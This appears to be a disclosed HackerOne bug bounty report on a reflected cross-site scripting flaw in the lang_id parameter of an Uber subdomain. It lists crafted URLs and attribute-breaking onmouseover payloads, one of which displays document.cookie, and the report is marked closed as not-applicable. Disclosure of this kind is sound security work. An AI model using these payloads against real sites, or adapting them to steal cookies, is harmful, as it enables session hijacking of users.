XSS At "pages.et.uber.com"

Disclosed: 2016-08-19 17:32:23 By raghav_bisht To uber
Unknown
Vulnerability Details
Vulnerable Domain : ------------------- https://pages.et.uber.com/ Vulnerable Link : ----------------- https://pages.et.uber.com/icecream/?lang_id=5 Edited Link With Payload : -------------------------- https://pages.et.uber.com/icecream/?lang_id=5%22%20onmouseover%3dprompt(document.domain)%20bad%3d%22 https://pages.et.uber.com/icecream/?lang_id=5%22%20onmouseover%3dprompt(document.cookie)%20bad%3d%22 https://pages.et.uber.com/icecream/?lang_id=5%22%20onmouseover%3dprompt(9020)%20bad%3d%22 Payload Used : -------------- " onmouseover%3dprompt(9020) bad%3d" " onmouseover%3dprompt(document.domain) bad%3d" " onmouseover%3dprompt(document.cookie) bad%3d"
Actions
View on HackerOne
Report Stats
  • Report ID: 156098
  • State: Closed
  • Substate: not-applicable
  • Upvotes: 233
Share this report